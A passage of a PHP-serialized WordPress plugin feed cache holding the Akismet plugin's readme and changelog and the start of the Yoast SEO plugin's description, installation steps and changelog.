comments and filters out the ones that look like spam.</li>\n<li>Each comment has a status history, so you can easily see which comments were caught or cleared by Akismet and which were spammed or unspammed by a moderator.</li>\n<li>URLs are shown in the comment body to reveal hidden or misleading links.</li>\n<li>Moderators can see the number of approved comments for each user.</li>\n<li>A discard feature that outright blocks the worst spam, saving you disk space and speeding up your site.</li>\n</ul>\n<p>PS: You&#8217;ll need an <a href="https://akismet.com/get/" rel="nofollow">Akismet.com API key</a> to use it.  Keys are free for personal blogs; paid subscriptions are available for businesses and commercial sites.</p>\n<p><!--section=installation--></p>\n<p>Upload the Akismet plugin to your blog, Activate it, then enter your <a href="https://akismet.com/get/" rel="nofollow">Akismet.com API key</a>.</p>\n<p>1, 2, 3: You&#8217;re done!</p>\n<p><!--section=changelog--></p>\n<h4>3.3.4</h4>\n<ul>\n<li>Disabled Akismet&#8217;s debug log output by default unless AKISMET_DEBUG is defined.</li>\n<li>URL previews now begin preloading when the mouse moves near them in the comments section of wp-admin.</li>\n<li>When a comment is caught by the Comment Blacklist, Akismet will always allow it to stay in the trash even if it is spam as well.</li>\n<li>Fixed a bug that was preventing an error from being shown when a site can&#8217;t reach Akismet&#8217;s servers.</li>\n</ul>\n<h4>3.3.3</h4>\n<p><em>Release Date &#8211; 13 July 2017</em></p>\n<ul>\n<li>Reduced amount of bandwidth used by the URL Preview feature.</li>\n<li>Improved the admin UI when the API key is manually pre-defined for the site.</li>\n<li>Removed a workaround for WordPress installations older than 3.3 that will improve Akismet&#8217;s compatibility with other plugins.</li>\n<li>The number of spam blocked that is displayed on the WordPress dashboard will now be more accurate and updated more frequently.</li>\n<li>Fixed a bug in the Akismet widget that could cause PHP warnings.</li>\n</ul>\n<h4>3.3.2</h4>\n<p><em>Release Date &#8211; 10 May 2017</em></p>\n<ul>\n<li>Fixed a bug causing JavaScript errors in some browsers.</li>\n</ul>\n<h4>3.3.1</h4>\n<p><em>Release Date &#8211; 2 May 2017</em></p>\n<ul>\n<li>Improve performance by only requesting the akismet_comment_nonce option when absolutely necessary.</li>\n<li>Fixed two bugs that could cause PHP warnings.</li>\n<li>Fixed a bug that was preventing the &#8220;Remove author URL&#8221; feature from working after a comment was edited using &#8220;Quick Edit.&#8221;</li>\n<li>Fixed a bug that was preventing the URL preview feature from working after a comment was edited using &#8220;Quick Edit.&#8221;</li>\n</ul>\n<h4>3.3</h4>\n<p><em>Release Date &#8211; 23 February 2017</em></p>\n<ul>\n<li>Updated the Akismet admin pages with a new clean design.</li>\n<li>Fixed bugs preventing the <code>akismet_add_comment_nonce</code> and <code>akismet_update_alert</code> wrapper functions from working properly.</li>\n<li>Fixed bug preventing the loading indicator from appearing when re-checking all comments for spam.</li>\n<li>Added a progress indicator to the &#8220;Check for Spam&#8221; button.</li>\n<li>Added a success message after manually rechecking the Pending queue for spam.</li>\n</ul>\n<h4>3.2</h4>\n<p><em>Release Date &#8211; 6 September 2016</em></p>\n<ul>\n<li>Added a WP-CLI module. You can now check comments and recheck the moderation queue from the command line.</li>\n<li>Stopped using the deprecated jQuery function <code>.live()</code>.</li>\n<li>Fixed a bug in <code>remove_comment_author_url()</code> and <code>add_comment_author_url()</code> that could generate PHP notices.</li>\n<li>Fixed a bug that could cause an infinite loop for sites with very very very large comment IDs.</li>\n<li>Fixed a bug that could cause the Akismet widget title to be blank.</li>\n</ul>\n<h4>3.1.11</h4>\n<p><em>Release Date &#8211; 12 May 2016</em></p>\n<ul>\n<li>Fixed a bug that could cause the &#8220;Check for Spam&#8221; button to skip some comments.</li>\n<li>Fixed a bug that could prevent some spam submissions from being sent to Akismet.</li>\n<li>Updated all links to use https:// when possible.</li>\n<li>Disabled Akismet debug logging unless WP_DEBUG and WP_DEBUG_LOG are both enabled.</li>\n</ul>\n<h4>3.1.10</h4>\n<p><em>Release Date &#8211; 1 April 2016</em></p>\n<ul>\n<li>Fixed a bug that could cause comments caught as spam to be placed in the Pending queue.</li>\n<li>Fixed a bug that could have resulted in comments that were caught by the core WordPress comment blacklist not to have a corresponding History entry.</li>\n<li>Fixed a bug that could have caused avoidable PHP warnings in the error log.</li>\n</ul>\n<h4>3.1.9</h4>\n<p><em>Release Date &#8211; 28 March 2016</em></p>\n<ul>\n<li>Add compatibility with Jetpack so that Jetpack can automatically configure Akismet settings when appropriate.</li>\n<li>Fixed a bug preventing some comment data from being sent to Akismet.</li>\n</ul>\n<h4>3.1.8</h4>\n<p><em>Release Date &#8211; 4 March 2016</em></p>\n<ul>\n<li>Fixed a bug preventing Akismet from being used with some plugins that rewrite admin URLs.</li>\n<li>Reduced the amount of bandwidth used on Akismet API calls</li>\n<li>Reduced the amount of space Akismet uses in the database</li>\n<li>Fixed a bug that could cause comments caught as spam to be placed in the Pending queue.</li>\n</ul>\n<h4>3.1.7</h4>\n<p><em>Release Date &#8211; 4 January 2016</em></p>\n<ul>\n<li>Added documentation for the &#8216;akismet_comment_nonce&#8217; filter.</li>\n<li>The post-install activation button is now accessible to screen readers and keyboard-only users.</li>\n<li>Fixed a bug that was preventing the &#8220;Remove author URL&#8221; feature from working in WordPress 4.4</li>\n</ul>\n<h4>3.1.6</h4>\n<p><em>Release Date &#8211; 14 December 2015</em></p>\n<ul>\n<li>Improve the notices shown after activating Akismet.</li>\n<li>Update some strings to allow for the proper plural forms in all languages.</li>\n</ul>\n<h4>3.1.5</h4>\n<p><em>Release Date &#8211; 13 October 2015</em></p>\n<ul>\n<li>Closes a potential XSS vulnerability.</li>\n</ul>\n<h4>3.1.4</h4>\n<p><em>Release Date &#8211; 24 September 2015</em></p>\n<ul>\n<li>Fixed a bug that was preventing some users from automatically connecting using Jetpack if they didn&#8217;t have a current Akismet subscription.</li>\n<li>Fixed a bug that could cause comments caught as spam to be placed in the Pending queue.</li>\n<li>Error messages and instructions have been simplified to be more understandable.</li>\n<li>Link previews are enabled for all links inside comments, not just the author&#8217;s website link.</li>\n</ul>\n<h4>3.1.3</h4>\n<p><em>Release Date &#8211; 6 July 2015</em></p>\n<ul>\n<li>Notify users when their account status changes after previously being successfully set up. This should help any users who are seeing blank Akismet settings screens.</li>\n</ul>\n<h4>3.1.2</h4>\n<p><em>Release Date &#8211; 7 June 2015</em></p>\n<ul>\n<li>Reduced the amount of space Akismet uses in the commentmeta table.</li>\n<li>Fixed a bug where some comments with quotes in the author name weren&#8217;t getting history entries</li>\n<li>Pre-emptive security improvements to ensure that the Akismet plugin can&#8217;t be used by attackers to compromise a WordPress installation.</li>\n<li>Better UI for the key entry field: allow whitespace to be included at the beginning or end of the key and strip it out automatically when the form is submitted.</li>\n<li>When deactivating the plugin, notify the Akismet API so the site can be marked as inactive.</li>\n<li>Clearer error messages.</li>\n</ul>\n<h4>3.1.1</h4>\n<p><em>Release Date &#8211; 17th March, 2015</em></p>\n<ul>\n<li>Improvements to the &#8220;Remove comment author URL&#8221; JavaScript</li>\n<li>Include the pingback pre-check from the 2.6 branch.</li>\n</ul>\n<h4>3.1</h4>\n<p><em>Release Date &#8211; 11th March, 2015</em></p>\n<ul>\n<li>Use HTTPS by default for all requests to Akismet.</li>\n<li>Fix for a situation where Akismet might strip HTML from a comment.</li>\n</ul>\n<h4>3.0.4</h4>\n<p><em>Release Date &#8211; 11th December, 2014</em></p>\n<ul>\n<li>Fix to make .htaccess compatible with Apache 2.4.</li>\n<li>Fix to allow removal of https author URLs.</li>\n<li>Fix to avoid stripping part of the author URL when removing and re-adding.</li>\n<li>Removed the &#8220;Check for Spam&#8221; button from the &#8220;Trash&#8221; and &#8220;Approved&#8221; queues, where it would have no effect.</li>\n<li>Allow automatic API key configuration when Jetpack is installed and connected to a WordPress.com account</li>\n</ul>\n<h4>3.0.3</h4>\n<p><em>Release Date &#8211; 3rd November, 2014</em></p>\n<ul>\n<li>Fix for sending the wrong data to delete_comment action that could have prevented old spam comments from being deleted.</li>\n<li>Added a filter to disable logging of Akismet debugging information.</li>\n<li>Added a filter for the maximum comment age when deleting old spam comments.</li>\n<li>Added a filter for the number per batch when deleting old spam comments.</li>\n<li>Removed the &#8220;Check for Spam&#8221; button from the Spam folder.</li>\n</ul>\n<h4>3.0.2</h4>\n<p><em>Release Date &#8211; 18th August, 2014</em></p>\n<ul>\n<li>Performance improvements.</li>\n<li>Fixed a bug that could truncate the comment data being sent to Akismet for checking.</li>\n</ul>\n<h4>3.0.1</h4>\n<p><em>Release Date &#8211; 9th July, 2014</em></p>\n<ul>\n<li>Removed dependency on PHP&#8217;s fsockopen function</li>\n<li>Fix spam/ham reports to work when reported outside of the WP dashboard, e.g., from Notifications or the WP app</li>\n<li>Remove jQuery dependency for comment form JavaScript</li>\n<li>Remove unnecessary data from some Akismet comment meta</li>\n<li>Suspended keys will now result in all comments being put in moderation, not spam.</li>\n</ul>\n<h4>3.0.0</h4>\n<p><em>Release Date &#8211; 15th April, 2014</em></p>\n<ul>\n<li>Move Akismet to Settings menu</li>\n<li>Drop Akismet Stats menu</li>\n<li>Add stats snapshot to Akismet settings</li>\n<li>Add Akismet subscription details and status to Akismet settings</li>\n<li>Add contextual help for each page</li>\n<li>Improve Akismet setup to use Jetpack to automate plugin setup</li>\n<li>Fix &#8220;Check for Spam&#8221; to use AJAX to avoid page timing out</li>\n<li>Fix Akismet settings page to be responsive</li>\n<li>Drop legacy code</li>\n<li>Tidy up CSS and Javascript</li>\n<li>Replace the old discard setting with a new &#8220;discard pervasive spam&#8221; feature.</li>\n</ul>\n<h4>2.6.0</h4>\n<p><em>Release Date &#8211; 18th March, 2014</em></p>\n<ul>\n<li>Add ajax paging to the check for spam button to handle large volumes of comments</li>\n<li>Optimize javascript and add localization support </li>\n<li>Fix bug in link to spam comments from right now dashboard widget</li>\n<li>Fix bug with deleting old comments to avoid timeouts dealing with large volumes of comments</li>\n<li>Include X-Pingback-Forwarded-For header in outbound WordPress pingback verifications</li>\n<li>Add pre-check for pingbacks, to stop spam before an outbound verification request is made</li>\n</ul>\n<h4>2.5.9</h4>\n<p><em>Release Date &#8211; 1st August, 2013</em></p>\n<ul>\n<li>Update &#8216;Already have a key&#8217; link to redirect page rather than depend on javascript</li>\n<li>Fix some non-translatable strings to be translatable</li>\n<li>Update Activation banner in plugins page to redirect user to Akismet config page</li>\n</ul>\n<h4>2.5.8</h4>\n<p><em>Release Date &#8211; 20th January, 2013</em></p>\n<ul>\n<li>Simplify the activation process for new users</li>\n<li>Remove the reporter_ip parameter</li>\n<li>Minor preventative security improvements</li>\n</ul>\n<h4>2.5.7</h4>\n<p><em>Release Date &#8211; 13th December, 2012</em></p>\n<ul>\n<li>FireFox Stats iframe preview bug</li>\n<li>Fix mshots preview when using https</li>\n<li>Add .htaccess to block direct access to files</li>\n<li>Prevent some PHP notices</li>\n<li>Fix Check For Spam return location when referrer is empty</li>\n<li>Fix Settings links for network admins</li>\n<li>Fix prepare() warnings in WP 3.5</li>\n</ul>\n<h4>2.5.6</h4>\n<p><em>Release Date &#8211; 26th April, 2012</em></p>\n<ul>\n<li>Prevent retry scheduling problems on sites where wp_cron is misbehaving</li>\n<li>Preload mshot previews</li>\n<li>Modernize the widget code</li>\n<li>Fix a bug where comments were not held for moderation during an error condition</li>\n<li>Improve the UX and display when comments are temporarily held due to an error</li>\n<li>Make the Check For Spam button force a retry when comments are held due to an error</li>\n<li>Handle errors caused by an invalid key</li>\n<li>Don&#8217;t retry comments that are too old</li>\n<li>Improve error messages when verifying an API key</li>\n</ul>\n<h4>2.5.5</h4>\n<p><em>Release Date &#8211; 11th January, 2012</em></p>\n<ul>\n<li>Add nonce check for comment author URL remove action</li>\n<li>Fix the settings link</li>\n</ul>\n<h4>2.5.4</h4>\n<p><em>Release Date &#8211; 5th January, 2012</em></p>\n<ul>\n<li>Limit Akismet CSS and Javascript loading in wp-admin to just the pages that need it</li>\n<li>Added author URL quick removal functionality</li>\n<li>Added mShot preview on Author URL hover</li>\n<li>Added empty index.php to prevent directory listing</li>\n<li>Move wp-admin menu items under Jetpack, if it is installed</li>\n<li>Purge old Akismet comment meta data, default of 15 days</li>\n</ul>\n<h4>2.5.3</h4>\n<p><em>Release Date &#8211; 8th Febuary, 2011</em></p>\n<ul>\n<li>Specify the license is GPL v2 or later</li>\n<li>Fix a bug that could result in orphaned commentmeta entries</li>\n<li>Include hotfix for WordPress 3.0.5 filter issue</li>\n</ul>\n<h4>2.5.2</h4>\n<p><em>Release Date &#8211; 14th January, 2011</em></p>\n<ul>\n<li>Properly format the comment count for author counts</li>\n<li>Look for super admins on multisite installs when looking up user roles</li>\n<li>Increase the HTTP request timeout</li>\n<li>Removed padding for author approved count</li>\n<li>Fix typo in function name</li>\n<li>Set Akismet stats iframe height to fixed 2500px.  Better to have one tall scroll bar than two side by side.</li>\n</ul>\n<h4>2.5.1</h4>\n<p><em>Release Date &#8211; 17th December, 2010</em></p>\n<ul>\n<li>Fix a bug that caused the &#8220;Auto delete&#8221; option to fail to discard comments correctly</li>\n<li>Remove the comment nonce form field from the &#8216;Akismet Configuration&#8217; page in favor of using a filter, akismet_comment_nonce</li>\n<li>Fixed padding bug in &#8220;author&#8221; column of posts screen</li>\n<li>Added margin-top to &#8220;cleared by &#8230;&#8221; badges on dashboard</li>\n<li>Fix possible error when calling akismet_cron_recheck()</li>\n<li>Fix more PHP warnings</li>\n<li>Clean up XHTML warnings for comment nonce</li>\n<li>Fix for possible condition where scheduled comment re-checks could get stuck</li>\n<li>Clean up the comment meta details after deleting a comment</li>\n<li>Only show the status badge if the comment status has been changed by someone/something other than Akismet</li>\n<li>Show a &#8216;History&#8217; link in the row-actions</li>\n<li>Translation fixes</li>\n<li>Reduced font-size on author name</li>\n<li>Moved &#8220;flagged by&#8230;&#8221; notification to top right corner of comment container and removed heavy styling</li>\n<li>Hid &#8220;flagged by&#8230;&#8221; notification while on dashboard</li>\n</ul>\n<h4>2.5.0</h4>\n<p><em>Release Date &#8211; 7th December, 2010</em></p>\n<ul>\n<li>Track comment actions under &#8216;Akismet Status&#8217; on the edit comment screen</li>\n<li>Fix a few remaining deprecated function calls ( props Mike Glendinning ) </li>\n<li>Use HTTPS for the stats IFRAME when wp-admin is using HTTPS</li>\n<li>Use the WordPress HTTP class if available</li>\n<li>Move the admin UI code to a separate file, only loaded when needed</li>\n<li>Add cron retry feature, to replace the old connectivity check</li>\n<li>Display Akismet status badge beside each comment</li>\n<li>Record history for each comment, and display it on the edit page</li>\n<li>Record the complete comment as originally submitted in comment_meta, to use when reporting spam and ham</li>\n<li>Highlight links in comment content</li>\n<li>New option, &#8220;Show the number of comments you&#8217;ve approved beside each comment author.&#8221;</li>\n<li>New option, &#8220;Use a nonce on the comment form.&#8221;</li>\n</ul>\n<h4>2.4.0</h4>\n<p><em>Release Date &#8211; 23rd August, 2010</em></p>\n<ul>\n<li>Spell out that the license is GPLv2</li>\n<li>Fix PHP warnings</li>\n<li>Fix WordPress deprecated function calls</li>\n<li>Fire the delete_comment action when deleting comments</li>\n<li>Move code specific for older WP versions to legacy.php</li>\n<li>General code clean up</li>\n</ul>\n<h4>2.3.0</h4>\n<p><em>Release Date &#8211; 5th June, 2010</em></p>\n<ul>\n<li>Fix &#8220;Are you sure&#8221; nonce message on config screen in WPMU</li>\n<li>Fix XHTML compliance issue in sidebar widget</li>\n<li>Change author link; remove some old references to WordPress.com accounts</li>\n<li>Localize the widget title (core ticket #13879)</li>\n</ul>\n<h4>2.2.9</h4>\n<p><em>Release Date &#8211; 2nd June, 2010</em></p>\n<ul>\n<li>Eliminate a potential conflict with some plugins that may cause spurious reports</li>\n</ul>\n<h4>2.2.8</h4>\n<p><em>Release Date &#8211; 27th May, 2010</em></p>\n<ul>\n<li>Fix bug in initial comment check for ipv6 addresses</li>\n<li>Report comments as ham when they are moved from spam to moderation</li>\n<li>Report comments as ham when clicking undo after spam</li>\n<li>Use transition_comment_status action when available instead of older actions for spam/ham submissions</li>\n<li>Better diagnostic messages when PHP network functions are unavailable</li>\n<li>Better handling of comments by logged-in users</li>\n</ul>\n<h4>2.2.7</h4>\n<p><em>Release Date &#8211; 17th December, 2009</em></p>\n<ul>\n<li>Add a new AKISMET_VERSION constant</li>\n<li>Reduce the possibility of over-counting spam when another spam filter plugin is in use</li>\n<li>Disable the connectivity check when the API key is hard-coded for WPMU</li>\n</ul>\n<h4>2.2.6</h4>\n<p><em>Release Date &#8211; 20th July, 2009</em></p>\n<ul>\n<li>Fix a global warning introduced in 2.2.5</li>\n<li>Add changelog and additional readme.txt tags</li>\n<li>Fix an array conversion warning in some versions of PHP</li>\n<li>Support a new WPCOM_API_KEY constant for easier use with WordPress MU</li>\n</ul>\n<h4>2.2.5</h4>\n<p><em>Release Date &#8211; 13th July, 2009</em></p>\n<ul>\n<li>Include a new Server Connectivity diagnostic check, to detect problems caused by firewalls</li>\n</ul>\n<h4>2.2.4</h4>\n<p><em>Release Date &#8211; 3rd June, 2009</em></p>\n<ul>\n<li>Fixed a key problem affecting the stats feature in WordPress MU</li>\n<li>Provide additional blog information in Akismet API calls</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<p>Upload the Akismet plugin to your blog, Activate it, then enter your <a href="https://akismet.com/get/" rel="nofollow">Akismet.com API key</a>.</p>\n<p>1, 2, 3: You&#8217;re done!</p>\n</dd>\n</dl>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:43:"https://wordpress.org/plugins/akismet/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:30:"\n		\n		\n		\n		\n		\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:9:"Yoast SEO";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:44:"https://wordpress.org/plugins/wordpress-seo/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 11 Oct 2010 20:55:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:47:"https://wordpress.org/plugins-wp/wordpress-seo/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:103:"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using&#8230;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Joost de Valk";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:16722:"<p><!--section=description--></p>\n<p>WordPress out of the box is already technically quite a good platform for SEO. This was true when Joost wrote his original <a href="https://yoast.com/articles/wordpress-seo/" rel="nofollow">WordPress SEO</a> article in 2008 (updated every few months) and it&#8217;s still true today, but that doesn&#8217;t mean you can&#8217;t improve it further! This plugin is written from the ground up by Joost de Valk and his team at <a href="https://yoast.com/" rel="nofollow">Yoast</a> to improve your site&#8217;s SEO on <em>all</em> needed aspects. While this <a href="https://yoast.com/wordpress/plugins/seo/" rel="nofollow">Yoast SEO plugin</a> goes the extra mile to take care of all the technical optimization, more on that below, it first and foremost helps you write better content.  Yoast SEO forces you to choose a focus keyword when you&#8217;re writing your articles, and then makes sure you use that focus keyword everywhere.</p>\n<blockquote>\n<p><strong>Premium Support</strong><br />\n  The Yoast team does not always provide active support for the Yoast SEO plugin on the WordPress.org forums. One-on-one email support is available to people who bought the <a href="https://yoast.com/wordpress/plugins/seo-premium/" rel="nofollow">Premium Yoast SEO plugin</a> only.<br />\n  Note that the Premium SEO plugin has several extra features too, including the option to have multiple focus keywords and a redirect manager, so it might be well worth your investment!</p>\n<p>You should also check out the <a href="https://yoast.com/wordpress/plugins/local-seo/" rel="nofollow">Yoast Local SEO</a>, <a href="https://yoast.com/wordpress/plugins/news-seo/" rel="nofollow">Yoast News SEO</a> and <a href="https://yoast.com/wordpress/plugins/video-seo/" rel="nofollow">Yoast Video SEO</a> extensions to Yoast SEO. These of course come with support too.</p>\n<p><strong>Bug Reports</strong><br />\n  Bug reports for Yoast SEO are <a href="https://github.com/Yoast/wordpress-seo" rel="nofollow">welcomed on GitHub</a>. Please note GitHub is <em>not</em> a support forum, and issues that aren&#8217;t properly qualified as bugs will be closed.</p>\n</blockquote>\n<h4>Write better content with Yoast SEO</h4>\n<p>Using the snippet preview, you can see a rendering of what your post or page will look like in the search results, whether your title is too long or too short, and whether your meta description makes sense in the context of a search result. This way the plugin will help you not only increase rankings but also increase the click through rate for organic search results.</p>\n<h4>Page Analysis</h4>\n<p>The Yoast SEO plugins <a href="https://yoast.com/content-seo-wordpress-linkdex/" rel="nofollow">Page Analysis</a> functionality checks simple things you&#8217;re bound to forget. It checks, for instance, if you have images in your post and whether they have an alt tag containing the focus keyword for that post. It also checks whether your posts are long enough, whether you&#8217;ve written a meta description and if that meta description contains your focus keyword, if you&#8217;ve used any subheadings within your post, etc. etc.</p>\n<p>The plugin also allows you to write meta titles and descriptions for all your category, tag and custom taxonomy archives, giving you the option to further optimize those pages.</p>\n<p>Combined, this plugin makes sure that your content is the type of content search engines will love!</p>\n<h4>Technical WordPress Search Engine Optimization</h4>\n<p>While out of the box WordPress is pretty good for SEO, it needs some tweaks here and there. This Yoast SEO plugin guides you through some of the settings needed, for instance by reminding you to enable pretty permalinks. But it also goes beyond that, by automatically optimizing and inserting the meta tags and link elements that Google and other search engines like so much:</p>\n<h4>Meta &amp; Link Elements</h4>\n<p>With the Yoast SEO plugin you can control which pages Google shows in its search results and which pages it doesn&#8217;t show. By default, it will tell search engines to index all of your pages, including category and tag archives, but to only show the first pages in the search results. It&#8217;s not very useful for a user to end up on the third page of your &#8220;personal&#8221; category, right?</p>\n<p>WordPress itself only shows canonical link elements on single pages, but Yoast SEO makes it output canonical link elements everywhere. Google has recently announced they would also use <code>rel="next"</code> and <code>rel="prev"</code> link elements in the <code>head</code> section of your paginated archives. This plugin adds those automatically. See <a href="https://yoast.com/rel-next-prev-paginated-archives/" rel="nofollow">this post</a> for more info.</p>\n<h4>XML Sitemaps</h4>\n<p>The Yoast SEO plugin has the most advanced XML Sitemaps functionality in any WordPress plugin. Once you check the box, it automatically creates XML sitemaps and notifies Google &amp; Bing of the sitemaps&#8217; existence. These XML sitemaps include the images in your posts &amp; pages too, so that your images may be found better in the search engines too.</p>\n<p>These XML Sitemaps will even work on large sites, because of how they&#8217;re created, using one index sitemap that links to sub-sitemaps for each 1,000 posts. They will also work with custom post types and custom taxonomies automatically, while giving you the option to remove those from the XML sitemap should you wish to.</p>\n<p>Because of using <a href="https://yoast.com/xsl-stylesheet-xml-sitemap/" rel="nofollow">XSL stylesheets for these XML Sitemaps</a>, the XML sitemaps are easily readable for the human eye too, so you can spot things that shouldn&#8217;t be in there.</p>\n<h4>RSS Optimization</h4>\n<p>Are you being outranked by scrapers? Instead of cursing at them, use them to your advantage! By automatically adding a link to your RSS feed pointing back to the original article, you&#8217;re telling the search engine where they should be looking for the original. This way, the Yoast SEO plugin increases your own chance of ranking for your chosen keywords and gets rid of scrapers in one go!</p>\n<h4>Breadcrumbs</h4>\n<p>If your theme is compatible, and themes based on for instance Genesis or by WooThemes often are, you can use the built-in Breadcrumbs functionality. This allows you to create an easy navigation that is great for both users and search engines, and will support the search engines in understanding the structure of your site.</p>\n<p>Making your theme compatible isn&#8217;t hard either, check <a href="https://kb.yoast.com/kb/implement-wordpress-seo-breadcrumbs/" rel="nofollow">these instructions</a>.</p>\n<h4>Edit your .htaccess and robots.txt file</h4>\n<p>Using the built-in file editor, you can edit your WordPress blog&#8217;s <code>.htaccess</code> and <code>robots.txt</code> file, giving you direct access to the two most powerful files, from an SEO perspective, in your WordPress install.</p>\n<h4>Social Integration</h4>\n<p>SEO and Social Media are heavily intertwined. That&#8217;s why this plugin also comes with a Facebook OpenGraph implementation and will soon also support Google+ sharing tags.</p>\n<h4>Multi-Site Compatible</h4>\n<p>The Yoast SEO plugin, unlike some others, is fully Multi-Site compatible. The XML Sitemaps work fine in all setups and you even have the option, in the Network settings, to copy the settings from one blog to another, or make blogs default to the settings for a specific blog.</p>\n<h4>Import &amp; Export functionality</h4>\n<p>If you have multiple blogs, setting up plugins like this one on all of them might seem like a daunting task. Except that it&#8217;s not, because what you can do is simple: you set up the plugin once. You then export your settings and simply import them on all your other sites. It&#8217;s that simple!</p>\n<h4>Import functionality for other WordPress SEO plugins</h4>\n<p>If you&#8217;ve used All In One SEO Pack or HeadSpace2 before using this plugin, you might want to import all your old titles and descriptions. You can do that easily using the built-in import functionality. There&#8217;s also import functionality for some of the older Yoast plugins, like Robots Meta and RSS footer.</p>\n<p>Should you have a need to import from another SEO plugin to Yoast SEO, or from a theme like Genesis or Thesis, you can use the <a href="https://wordpress.org/extend/plugins/seo-data-transporter/" rel="nofollow">SEO Data Transporter</a> plugin, which will easily convert your SEO meta data from and to a whole set of plugins like Platinum SEO, SEO Ultimate, Greg&#8217;s High Performance SEO, and themes like Headway, Hybrid, WooFramework, Catalyst etc.</p>\n<p>Read <a href="https://yoast.com/all-in-one-seo-pack-migration/" rel="nofollow">this migration guide</a> if you still have questions about migrating from another SEO plugin to Yoast SEO.</p>\n<h4>Yoast SEO Plugin in your Language!</h4>\n<p>Currently a huge translation project is underway, translating Yoast SEO in as much as 24 languages. So far, the translations for French and Dutch are complete, but we still need help on a lot of other languages, so if you&#8217;re good at translating, please join us at <a href="http://translate.yoast.com" rel="nofollow">translate.yoast.com</a>.</p>\n<h4>News SEO</h4>\n<p>Be sure to also check out the premium <a href="https://yoast.com/wordpress/plugins/news-seo/" rel="nofollow">News SEO module</a> if you need Google News Sitemaps. It tightly integrates with Yoast SEO to give you the combined power of News Sitemaps and full Search Engine Optimization.</p>\n<h4>Further Reading</h4>\n<p>For more info, check out the following articles:</p>\n<ul>\n<li>The <a href="https://kb.yoast.com/kb/category/yoast-seo/" rel="nofollow">Yoast SEO Knowledgebase</a>.</li>\n<li><a href="https://yoast.com/articles/wordpress-seo/" rel="nofollow">WordPress SEO &#8211; The definitive Guide by Yoast</a>.</li>\n<li>Once you have great SEO, you&#8217;ll need the <a href="https://yoast.com/articles/wordpress-hosting/" rel="nofollow">best WordPress Hosting</a>.</li>\n<li>The <a href="https://yoast.com/wordpress/plugins/seo/" rel="nofollow">Yoast SEO Plugin</a> official homepage.</li>\n<li>Other <a href="https://yoast.com/wordpress/plugins/" rel="nofollow">WordPress Plugins</a> by the same team.</li>\n<li>Follow Yoast on <a href="https://facebook.com/yoast" rel="nofollow">Facebook</a> &amp; <a href="http://twitter.com/yoast" rel="nofollow">Twitter</a>.</li>\n</ul>\n<h3>From within WordPress</h3>\n<ol>\n<li>Visit &#8216;Plugins &gt; Add New&#8217;</li>\n<li>Search for &#8216;Yoast SEO&#8217;</li>\n<li>Activate Yoast SEO from your Plugins page.</li>\n<li>Go to &#8220;after activation&#8221; below.</li>\n</ol>\n<h3>Manually</h3>\n<ol>\n<li>Upload the <code>wordpress-seo</code> folder to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the Yoast SEO plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Go to &#8220;after activation&#8221; below.</li>\n</ol>\n<h3>After activation</h3>\n<ol>\n<li>You should see (a notice to start) the Yoast SEO configuration wizard.</li>\n<li>Go through the configuration wizard and set up the plugin for your site.</li>\n<li>You&#8217;re done!</li>\n</ol>\n<p><!--section=faq--></p>\n<p>You&#8217;ll find answers to many of your questions on <a href="https://kb.yoast.com/kb/category/yoast-seo/" rel="nofollow">kb.yoast.com</a>.</p>\n<p><!--section=changelog--></p>\n<h4>5.3.1</h4>\n<p>Release Date: August 22nd, 2017</p>\n<ul>\n<li>Bugfixes\n<ul>\n<li>Fixes a bug where &#8220;mark as fixed&#8221; on the search console page didn&#8217;t work.</li>\n<li>Fixes a bug where the configuration wizard JavaScript file was too large.</li>\n</ul>\n</li>\n</ul>\n<h4>5.3.0</h4>\n<p>Release Date: August 22nd, 2017</p>\n<ul>\n<li>\n<p>Enhancements</p>\n<ul>\n<li>Adds missing I18n function call to make a string translatable</li>\n<li>Adds XML schema for image sitemap, props: <a href="https://github.com/stodorovic" rel="nofollow">stodorovic</a></li>\n<li>Adds schema.org meta-data on every page, instead of only on the homepage</li>\n<li>Adds the possibility to filter posts by readability score.</li>\n<li>Exposes 